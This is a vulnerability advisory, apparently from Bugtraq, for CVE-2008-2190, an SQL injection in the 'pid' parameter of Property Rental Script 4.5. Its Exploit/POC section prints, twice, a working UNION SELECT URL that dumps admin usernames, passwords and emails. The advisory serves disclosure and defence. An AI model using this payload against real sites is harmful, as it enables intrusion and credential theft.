Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
BID:29052
Info
Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 29052 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2190 |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | M.Hasran Addahroni |
| Vulnerable: |
Online-rent.com Property Rental Script 4.5 |
| Not Vulnerable: | |
Discussion
Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
Online-rent.com Property Rental Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Property Rental Script 4.5 is vulnerable; other versions may also be affected.
Online-rent.com Property Rental Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Property Rental Script 4.5 is vulnerable; other versions may also be affected.
Exploit / POC
Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,password,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20admin--&user=det
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,password,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20admin--&user=det
Solution / Fix
Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
Solution:
The vendor states that this issue has been fixed. Please see the references and contact the vendor for information on how to obtain the fix.
Solution:
The vendor states that this issue has been fixed. Please see the references and contact the vendor for information on how to obtain the fix.
References
Online-rent.com Property Rental Script 'pid' Parameter SQL Injection Vulnerability
References:
References: